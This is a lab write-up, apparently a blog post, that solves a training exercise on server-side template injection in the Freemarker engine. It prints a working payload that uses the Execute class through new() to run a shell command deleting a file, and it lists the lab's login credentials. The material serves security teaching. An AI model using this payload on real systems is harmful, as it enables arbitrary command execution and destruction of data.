28.3 Lab: Server-side template injection using documentation
This lab is vulnerable to server-side template injection. To solve the lab, identify the template engine and use the documenta tion to work out how to execute arbitrary code, then delete the morale.txt file from Carlos’s home directory | Karthikeyan Nagaraj
2 min readJun 8, 2024
Description
This lab is vulnerable to server-side template injection. To solve the lab, identify the template engine and use the documentation to work out how to execute arbitrary code, then delete the morale.txt
file from Carlos's home directory.
You can log in to your own account using the following credentials:
content-manager:C0nt3ntM4n4g3r
Solution
- Log in and edit one of the product description templates. Notice that this template engine uses the syntax
${someExpression}
to render the result of an expression on the page. Either enter your own expression or change one of the existing ones to refer to an object that doesn't exist, such as${foobar}
, and save the template. The error message in the output shows that the Freemarker template engine is being used. - Study the Freemarker documentation and find that appendix contains an FAQs section with the question “Can I allow users to upload templates and what are the security implications?”. The answer describes how the
new()
built-in can be dangerous. - Go to the “Built-in reference” section of the documentation and find the entry for
new()
. This entry further describes hownew()
is a security concern because it can be used to create arbitrary Java objects that implement theTemplateModel
interface. - Load the JavaDoc for the
TemplateModel
class, and review the list of "All Known Implementing Classes". - Observe that there is a class called
Execute
, which can be used to execute arbitrary shell commands - Either attempt to construct your own exploit, or find @albinowax’s exploit on our research page and adapt it as follows:
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("rm /home/carlos/morale.txt") }
- Remove the invalid syntax that you entered earlier, and insert your new payload into the template.
- Save the template and view the product page to solve the lab.
A YouTube Channel for Cybersecurity Lab’s Poc and Write-ups
Telegram Channel for Free Ethical Hacking Dumps
Thank you for Reading!
Happy Ethical Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng